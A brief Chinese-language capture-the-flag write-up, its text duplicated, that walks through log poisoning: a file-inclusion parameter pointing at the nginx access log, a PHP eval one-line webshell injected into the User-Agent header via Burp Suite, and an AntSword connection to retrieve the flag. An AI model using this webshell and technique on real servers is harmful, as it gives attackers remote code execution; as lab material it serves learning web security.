这一道题他们给的提示是
?url=/var/log/nginx/access.log
用上面的这个来找出日志接下来就是文件包含这里我们要用到bp
抓包后我们在User-Agent中插入一句话木马<?php @eval($_POST['你的蚁剑连接的密码自己设置']);?>
之后连接你的蚁剑
测试连接连接成功
最后就会得到flag。
这一道题他们给的提示是
?url=/var/log/nginx/access.log
用上面的这个来找出日志接下来就是文件包含这里我们要用到bp
抓包后我们在User-Agent中插入一句话木马<?php @eval($_POST['你的蚁剑连接的密码自己设置']);?>
之后连接你的蚁剑
测试连接连接成功
最后就会得到flag。